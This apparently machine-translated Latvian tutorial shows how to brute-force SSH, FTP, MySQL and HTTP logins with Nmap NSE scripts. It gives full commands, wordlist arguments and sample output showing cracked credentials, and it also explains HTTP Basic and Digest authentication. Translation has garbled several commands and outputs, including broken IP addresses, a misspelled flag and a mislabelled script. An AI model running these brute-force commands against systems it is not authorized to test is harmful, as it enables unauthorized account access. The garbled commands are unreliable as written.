[aizsargāts ar e-pastu]: ~ $ sudo apt install nmap -y
[aizsargāts ar e-pastu]: ~ $ cd / usr / share / nmap / scripts /
[aizsargāts ar e-pastu]: ~ $ ls * brute *
Šajā apmācībā mēs izpētīsim, kā mēs varam izmantot Nmap brutālu spēku uzbrukumam.
SSH Brute-Force
SSH ir drošs attālās administrēšanas protokols, un tas atbalsta openssl un paroli balstītu autentifikāciju. Lai uz SSH paroli balstītu brutālu spēku autentifikāciju, mēs varam izmantot “ssh-brute.nse ”Nmap skripts.
ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ssh * brute *ssh-brute.nse
Nmap nodot kā argumentu lietotājvārdu un paroļu sarakstu.
[aizsargāts ar e-pastu]: ~ $ nmap --script ssh-brute -p22 192.168. lpp.43.181--script-args userdb = lietotāji.txt, passdb = paroles.txt
Sākot Nmap 7.70 (https: // nmap.org) plkst. 2020-02-08 17:09 PKT
Nmap skenēšanas ziņojums 192.168. lpp.43.181
Saimnieks ir augšā (0.00033s latentums).
OSTAS VALSTS PAKALPOJUMS
22 / tcp atvērt ssh
| ssh-brute:
| Konti:
| admin: p4ssw0rd - derīgi akreditācijas dati
| _ Statistika: veica 99 minējumus 60 sekundēs, vidējie tps: 1.7
N karte pabeigta: 60 IP skenēta 1 IP adrese (1 resursdators augšup).17 sekundes
FTP Brute-Force
FTP ir failu pārsūtīšanas protokols, kas atbalsta uz paroli balstītu autentifikāciju. Lai rupji izturētu FTP, mēs izmantosim “ftp-brute.nse ”Nmap skripts.
ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ftp * brute *ftp-brute.nse
Nmap nodot kā argumentu lietotājvārdu un paroļu sarakstu.
[aizsargāts ar e-pastu]: ~ $ nmap --cript ftp-brute -p21 192.168. lpp.43.181. gads - skripts-argsuserdb = lietotāji.txt, passdb = paroles.txt
Sākot Nmap 7.70 (https: // nmap.org) plkst. 2020-02-08 16:51 PKT
Nmap skenēšanas ziņojums 192.168. lpp.43.181
Saimnieks ir augšā (0.00021s latentums).
OSTAS VALSTS PAKALPOJUMS
21 / tcp atvērts ftp
| ftp-brute:
| Konti:
| admin: p4ssw0rd - derīgi akreditācijas dati
| _ Statistika: veica 99 minējumus 20 sekundēs, vidējie tps: 5.0
N karte pabeigta: 19 IP skenēta 1 IP adrese (1 resursdators augšup).50 sekundes
MYSQL Brute-Force
Dažreiz MySQL tiek atstāts atvērts ārējiem savienojumiem un ļauj ikvienam ar to izveidot savienojumu. Tās paroli var uzlauzt, izmantojot Nmap ar skriptu “mysql-brute”.
[aizsargāts ar e-pastu]: ~ $ sudo nmap --script mysql-brute -p3306 192.168. lpp.43.181--script-args userdb = lietotāji.txt, passdb = paroles.txt
Sākot Nmap 7.70 (https: // nmap.org) plkst. 2020-02-08 16:51 PKT
Nmap skenēšanas ziņojums 192.168. lpp.43.181
Saimnieks ir augšā (0.00021s latentums).
OSTAS VALSTS PAKALPOJUMS
3306 / tcp atvērts mysql
| ftp-brute:
| Konti:
| admin: p4ssw0rd - derīgi akreditācijas dati
| _ Statistika: veica 99 minējumus 20 sekundēs, vidējie tps: 5.0
N karte pabeigta: 19 IP skenēta 1 IP adrese (1 resursdators augšup).40 sekundes
HTTP Brute-Force
HTTP izmanto trīs autentifikācijas veidus, lai autentificētu lietotājus tīmekļa serveros. Šīs metodikas tiek izmantotas maršrutētājos, modemos un uzlabotās tīmekļa lietojumprogrammās, lai apmainītos ar lietotājvārdiem un parolēm. Šie veidi ir:
Pamata autentifikācija
HTTP pamata autentifikācijas protokolā pārlūks kodē lietotājvārdu un paroli ar base64 un nosūta tos galvenē “Autorizācija”. To var redzēt nākamajā ekrānuzņēmumā.
Autorizācija: pamata YWRtaW46YWRtaW4 =
Jūs varat base64 atšifrēt šo virkni, lai redzētu lietotājvārdu un paroli
[e-pasts aizsargāts]: ~ $ echo YWRtaW46YWRtaW4 = | base64 -dadmin: admin
HTTP pamata autentifikācija nav droša, jo tā nosūta gan lietotājvārdu, gan paroli vienkāršā tekstā. Jebkurš Man-in-the-Middle Attacker var viegli pārtvert trafiku un atšifrēt virkni, lai iegūtu paroli.
Sagremota autentifikācija
HTTP satura autentifikācija izmanto jaukšanas paņēmienus, lai šifrētu lietotājvārdu un paroli pirms to nosūtīšanas uz serveri.
Hash1 = MD5 (lietotājvārds: valstība: parole)Hash2 = MD5 (metode: digestURI)
atbilde = MD5 (Hash1: nonce: nonceCount: cnonce: qop: Hash2)
Šīs vērtības varat redzēt zem galvenes “Autorizācija”.
Sagremota autentifikācija ir droša, jo parole netiek nosūtīta vienkāršā tekstā. Ja uzbrucējs “Man-in-the-Middle” pārtver trafiku, viņš nevarēs iegūt vienkārša teksta paroli.
Veidlapas autentifikācija
Pamata un Digest autentifikācijas atbalsta tikai lietotājvārda un paroles pārsūtīšanu, savukārt uz veidlapu balstītu autentifikāciju var pielāgot, ņemot vērā lietotāja vajadzības. Varat izveidot savu vietni HTML vai JavaScript, lai izmantotu savas kodēšanas un pārsūtīšanas metodes.
Parasti dati veidlapas autentifikācijā tiek sūtīti vienkāršā tekstā. Drošības problēmu gadījumā ir jāpielieto HTTP, lai novērstu uzbrukumus Man-in-the-Middle.
Mēs varam brutāli piespiest visu veidu HTTP autentifikāciju, izmantojot Nmap. Šim nolūkam mēs izmantosim skriptu “http-brute”.
ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * http * brute *http-brute.nse
Lai pārbaudītu šo Nmap skriptu, mēs šajā URL atrisināsim publiski mitinātu brutālu spēku izaicinājumu, ko veica pentesteru akadēmija http: // pentesteracademylab.appspot.com / lab / webapp / basicauth.
Mums kā skripta arguments atsevišķi jānorāda viss, ieskaitot resursdatora nosaukumu, URI, pieprasījuma metodi un vārdnīcas.
[aizsargāts ar e-pastu]: ~ $ sudo nmap -p80 --script http-brute pentesteracademylab.appspot.com--script-args http-brute.resursdatora nosaukums = pentesteracademylab.appspot.com,
http-brute.ceļš = / lab / webapp / basicauth, userdb = lietotāji.txt, passdb = paroles.txt,
http-brute.metode = POST
Sākot Nmap 7.70 (https: // nmap.org) plkst. 2020-02-08 21:37 PKT
Nmap skenēšanas ziņojums pentesteracademylab.appspot.com (216.58.210.84)
Saimnieks ir augšā (0.20 gadu latentums).
Citas pentesteracademylab adreses.appspot.com (nav skenēts): 2a00: 1450: 4018: 803 :: 2014
rDNS rekords 216. gadā.58.210.84: mct01s06-in-f84.1e100.tīkls
OSTAS VALSTS PAKALPOJUMS
80 / tcp atveriet http
| http-brute:
| Konti:
| admin: aaddd - derīgi akreditācijas dati
| _ Statistika: 29 sekundēs veica 165 minējumus, vidējie tps: 5.3
N karte pabeigta: 31 IP skenēta 1 IP adrese (1 resursdators augšup).22 sekundes
Secinājums
Nmap var izmantot, lai veiktu daudzas lietas, neskatoties uz vienkāršu ostu skenēšanu. Tas var aizstāt Metasploit, Hydra, Medusa un daudzus citus rīkus, kas īpaši izveidoti tiešsaistes brutālai piespiešanai. Nmap ir vienkārši, viegli lietojami iebūvēti skripti, kas iztur gandrīz visus pakalpojumus, tostarp HTTP, TELNEL, SSH, MySQL, Samba un citus.